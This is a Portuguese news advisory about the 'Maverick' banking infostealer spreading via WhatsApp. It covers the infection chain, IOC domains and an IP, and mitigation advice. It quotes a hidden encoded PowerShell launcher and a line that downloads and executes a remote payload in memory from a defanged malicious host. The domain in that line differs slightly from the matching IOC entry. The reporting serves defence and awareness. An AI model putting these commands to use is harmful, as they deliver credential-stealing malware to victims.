Malware “Maverick” se espalha pelo WhatsApp e rouba credenciais bancárias, alertam especialistas

Pesquisadores de segurança identificaram uma nova campanha de malware que circula pelo WhatsApp desde o início de outubro. O código malicioso, batizado de Maverick, é classificado como infostealer e tem como alvo principal dados bancários e carteiras de criptomoedas.

Como o golpe funciona

As mensagens fraudulentas chegam aos usuários com termos como “comprovante” ou “PED” e instruem a vítima a abrir um arquivo em um computador. O anexo vem comprimido em formato .zip; dentro dele há um atalho .lnk que aciona um comando PowerShell:

powershell.exe -w hid -enc SQBFAFg[...base64...]

O script decodifica outra instrução que baixa e executa, diretamente na memória, um novo payload hospedado em https://servetenopote[.]com:

IEX (New-Object Net.WebClient).DownloadString(https://servetenopote[.]com/%5B%5D)

Por rodar somente em memória, a ameaça é considerada fileless, dificultando a detecção por antivírus tradicionais.

Etapas de infecção

Os analistas mapearam três fases principais:

ZIP → LNK → PowerShell → DLL → EXE → BAT (persistência na pasta Startup)

Malware “Maverick” se espalha pelo WhatsApp e rouba credenciais bancárias, alertam especialistas - Imagem do artigo original

Imagem: Internet

A DLL é carregada sem criar arquivos no disco, reforçando o caráter fileless. Em seguida, o malware obtém credenciais, verifica o uso de navegadores e bancos específicos e tenta se propagar enviando o mesmo arquivo para contatos da vítima via WhatsApp Web e, em alguns casos, pelo aplicativo móvel.

Semelhança com campanhas anteriores

O Maverick apresenta características próximas ao malware Coyote, detectado em fevereiro. Apesar disso, as amostras atuais foram catalogadas como uma nova variante.

Indicadores de comprometimento (IOCs)

Domínios e IP associados à campanha:

  • zapgrande[.]com
  • sorvetenopote[.]com
  • expansiveuser[.]com
  • ogoampoodopet[.]com
  • 109.176.30.141

Recomendações aos usuários e empresas

  • Manter soluções antimalware, EDR e listas de IOCs atualizadas.
  • Restringir a execução de PowerShell a máquinas que realmente precisem do recurso.
  • Desativar o download automático de arquivos no WhatsApp.
  • Promover campanhas de conscientização para que colaboradores não abram arquivos .zip, .lnk, .ps1 recebidos por mensageiros.
  • Adotar autenticação multifator, especialmente em contas bancárias e sistemas internos.

Os pesquisadores continuam investigando a amplitude da ameaça e recomendam vigilância redobrada sobre qualquer arquivo recebido, mesmo de contatos confiáveis.

Com informações de SegInfo